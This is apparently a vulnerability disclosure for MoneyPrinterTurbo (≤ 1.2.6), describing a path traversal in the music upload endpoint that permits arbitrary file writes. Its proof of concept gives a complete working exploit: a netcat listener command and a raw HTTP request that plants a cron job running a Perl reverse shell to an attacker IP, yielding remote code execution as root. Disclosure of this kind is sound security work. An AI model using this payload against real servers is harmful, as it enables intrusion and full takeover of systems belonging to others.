BUG_Author: xuanSAMA

Affected Version: MoneyPrinterTurbo ≤ 1.2.6

Vendor: MoneyPrinterTurbo GitHub Repository

Software: MoneyPrinterTurbo

Vulnerability Files:

• app/controllers/v1/music.py

Description:

1. Arbitrary File Write Vulnerability:
   • In the file app/controllers/v1/music.py, the upload_music function handles file uploads to the /api/v1/musics endpoint. The function accepts a filename parameter from a multipart/form-data request. This user-controlled filename is not properly sanitized for path traversal characters (../).
2. Exploiting the Vulnerability:
   • An attacker can craft a POST request with a malicious filename containing "dot-dot-slash (../)" sequences. This allows them to write a file to an arbitrary location on the server's filesystem, outside of the intended directory. The application only checks if the filename ends with "mp3", which can be easily bypassed by naming the file something like evil.mp3 or, in this case, 1mp3.
3. Impact:
   • This vulnerability can lead to Remote Code Execution (RCE). By writing a file to a sensitive location, such as a cron job directory (/etc/cron.d/), an attacker can execute arbitrary commands. For this specific vector to succeed, the cron daemon must be installed and running on the target server to process the malicious file.
4. Example Payload for RCE:
   • The following payload demonstrates writing a cron job that executes a Perl reverse shell every minute. The attacker sets up a listener to receive the connection, gaining a shell on the vulnerable server.

Proof of Concept:

1. Prerequisite: The cron daemon (cron/crond) must be installed and running on the target server. The exploit relies on this service to execute the scheduled payload.

2. Start a listener on the attacker's machine to catch the reverse shell. The port should match the one specified in the payload (e.g., port 80).

   nc -lvnp 80
   
   

3. Use a tool like curl to send the following POST request to the target server, replacing <target-ip>:<port> with the application's address and <attacker-ip> with the listener's IP address.

   POST /api/v1/musics HTTP/1.1
   Host: <target-ip>:<port>
   Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBXzYq0O8O6IOvAV5
   User-Agent: Mozilla/5.0
   Connection: close
   Content-Length: 497
   
   ------WebKitFormBoundaryBXzYq0O8O6IOvAV5
   Content-Disposition: form-data; name="file"; filename="../../../../../etc/cron.d/1mp3"
   Content-Type: application/octet-stream
   
   */1 * * * * root /usr/bin/perl -e 'use Socket;$i="<attacker-ip>";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
   ------WebKitFormBoundaryBXzYq0O8O6IOvAV5--
   
   

4. Verifying the Exploit:

   • The server will accept the file upload and save the payload to /etc/cron.d/1mp3.
   • If cron is running, it will read the new file and schedule the job. Within one minute, the job will trigger, executing the Perl reverse shell.
   • The attacker's netcat listener will receive an incoming connection, providing a shell on the compromised server. This confirms successful arbitrary file write and remote code execution.